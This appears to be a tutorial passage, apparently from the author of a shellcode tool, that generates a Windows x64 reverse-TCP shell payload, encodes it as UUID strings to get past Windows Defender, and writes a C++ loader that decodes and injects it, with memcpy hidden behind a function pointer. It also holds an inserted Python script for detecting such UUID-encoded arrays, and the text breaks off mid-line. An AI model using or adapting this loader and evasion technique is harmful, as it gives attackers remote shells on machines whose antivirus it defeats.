Tools
The encoder is part of my shellcode tool ShenCode, which is available as open source.
Step 1: Prepare shellcode
generate
We create a payload without further encryption or encoding. This is usually recognised by Windows Defender.
<code bash>
python shencode.py create -c="-p windows/x64/shell/reverse_tcp LHOST=IPADDRESS LPORT=PORT -f raw -o shell_rev.raw"
</code>
encode
We now encode this payload as UUID strings.
<code bash>
python shencode.py encode -f shell_rev.raw -u
</code>
The output now looks something like this:
<code cpp>
[*] try to open file
[+] reading 240906.001 successful!
[*] try to generate UUIDs
std::vector<std::string> sID = {
    "fce88f00-0000-6031-d264-8b523089e58b",
    "520c8b52-148b-7228-0fb7-4a2631ff31c0",
    "ac3c617c-022c-20c1-cf0d-01c74975ef52",
    "578b5210-8b42-3c01-d08b-407885c0744c",
    …
    "c85fffd5-83f8-007d-2858-68004000006a",
    "0050680b-2f0f-30ff-d557-68756e4d61ff",
    "d55e5eff-0c24-0f85-70ff-ffffe99bffff",
    "ff01c329-c675-c1c3-bbf0-b5a2566a0053",
    "ffd5"
};
[+] DONE!
</code>
Step 2: Write Inject.cpp
Header
obfuscated shellcode
We create a new C++ project and paste in the obfuscated string array generated in the previous step.
<code cpp>
#include <stdio.h>
#include <windows.h>
#include <iostream>
#include <sstream>
#include <vector>
#include <iomanip>
#include <string>     // std::string
#include <algorithm>  // std::remove, needed by removeDashes()
#pragma warning

// Shellcode encoded as UUID strings (output of "shencode.py encode -u")
std::vector<std::string> sID = {
    "fce88f00-0000-6031-d264-8b523089e58b",
    "520c8b52-148b-7228-0fb7-4a2631ff31c0",
    "ac3c617c-022c-20c1-cf0d-01c74975ef52",
    "578b5210-8b42-3c01-d08b-407885c0744c",
    …
    "c85fffd5-83f8-007d-2858-68004000006a",
    "0050680b-2f0f-30ff-d557-68756e4d61ff",
    "d55e5eff-0c24-0f85-70ff-ffffe99bffff",
    "ff01c329-c675-c1c3-bbf0-b5a2566a0053",
    "ffd5"
};
</code>
Encoding and injection
Remove superfluous characters
First, we need a function that removes the ''-'' characters. The string is passed by reference and cleaned up in place.
<code cpp>
// Strip every '-' from the string in place (std::remove comes from <algorithm>)
void removeDashes(std::string& str)
{
    str.erase(std::remove(str.begin(), str.end(), '-'), str.end());
}
</code>
Convert strings to bytes
The next function converts the UUID strings into executable bytes. The string array is processed element by element:
* Remove the ''-'' characters
* Read two hex characters at a time and convert them into one byte
* Once the whole string array has been processed, return the generated byte array to the caller
<code cpp>
// Decode the UUID strings back into raw bytes
std::vector<uint8_t> convertToBytes(const std::vector<std::string>& inputStrings)
{
    std::vector<uint8_t> byteArray;
    for (const auto& str : inputStrings)
    {
        std::string cleanStr = str;
        removeDashes(cleanStr);
        // Two hex characters form one byte; a trailing odd nibble is ignored
        for (size_t i = 0; i < cleanStr.length(); i += 2)
        {
            if (i + 1 < cleanStr.length())
            {
                std::string byteString = cleanStr.substr(i, 2);
                uint8_t byte = static_cast<uint8_t>(std::stoi(byteString, nullptr, 16));
                byteArray.push_back(byte);
            }
        }
    }
    return byteArray;
}
</code>
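From the defender's side, the same dash-stripping, hex-pair rule can be reversed to triage source code or strings output for an embedded UUID-string array. The following Python script is an added example, not part of the original post or of ShenCode; the sample input and the list of prologue byte prefixes are constructed for illustration.

```python
import re

# Any double-quoted literal (the C++ initialiser form used on this page) and the
# 8-4-4-4-12 layout that the page's encoder emits for every full UUID.
QUOTED_RE = re.compile(r'"([^"\n]*)"')
UUID_FORM_RE = re.compile(r'^[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}$')

# Constructed sample input: the first two UUID strings shown on this page plus the short tail.
SAMPLE_SOURCE = '''
std::vector<std::string> sID = {
    "fce88f00-0000-6031-d264-8b523089e58b",
    "520c8b52-148b-7228-0fb7-4a2631ff31c0",
    "ffd5"
};
'''

# Byte prefixes worth flagging after decoding (constructed, illustrative list).
KNOWN_PROLOGUES = {
    bytes.fromhex("fce8"): "x86 cld; call prologue",
    bytes.fromhex("fc4883e4f0"): "x64 cld; and rsp,-16 prologue",
}

def decode_uuid_strings(strings):
    """Reverse the page's encoding: drop dashes, read hex pairs, ignore an odd trailing nibble."""
    out = bytearray()
    for s in strings:
        clean = s.replace("-", "")
        for i in range(0, len(clean) - 1, 2):
            out.append(int(clean[i:i + 2], 16))
    return bytes(out)

def extract_hex_strings(text):
    """Return quoted literals that are pure hex once dashes are removed."""
    return [lit for lit in QUOTED_RE.findall(text)
            if len(lit.replace("-", "")) >= 2
            and all(c in "0123456789abcdefABCDEF" for c in lit.replace("-", ""))]

def scan_source(text, min_uuids=2):
    """Flag an array of UUID strings, decode it and report size and any known prologue."""
    strings = extract_hex_strings(text)
    uuid_count = sum(1 for s in strings if UUID_FORM_RE.match(s))
    if uuid_count < min_uuids:
        return {"suspicious": False, "uuid_count": uuid_count}
    payload = decode_uuid_strings(strings)
    hit = next((n for p, n in KNOWN_PROLOGUES.items() if payload.startswith(p)), None)
    return {"suspicious": True, "uuid_count": uuid_count, "decoded_len": len(payload),
            "prologue": hit, "head": payload[:8].hex()}
```

Run `scan_source()` over `strings` output of a binary or over a source tree; a hit on the decoded head is a strong signal, but a plain UUID-string array with high byte entropy already merits a closer look.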
Main programme
The main program initialises the variables, calls the conversion function, prints the decoded bytes to the console and then performs the injection.
To disguise this step somewhat, ''memcpy'' is not called directly but through a function pointer of our own.
<code cpp>
int main()
{
    std::vector<std::string> input = sID;
    std::vector<uint8_t> result = convertToBytes(input);
    unsigned char* Payload = reinterpret_cast<unsigned char*>(result.data());
    size_t byteArrayLength = result.size();
    std::cout << "[x] Payload size: " << byteArrayLength << " bytes" << std::endl;

    // Hex dump of the decoded payload, 8 bytes per line
    for (size_t i = 0; i < byteArrayLength; ++i)
    {
        std::cout << std::hex << std::setw(2) << std::setfill('0') << static_cast<int>(Payload[i]) << " ";
        if ((i + 1) % 8 == 0)
        {
            std::cout << st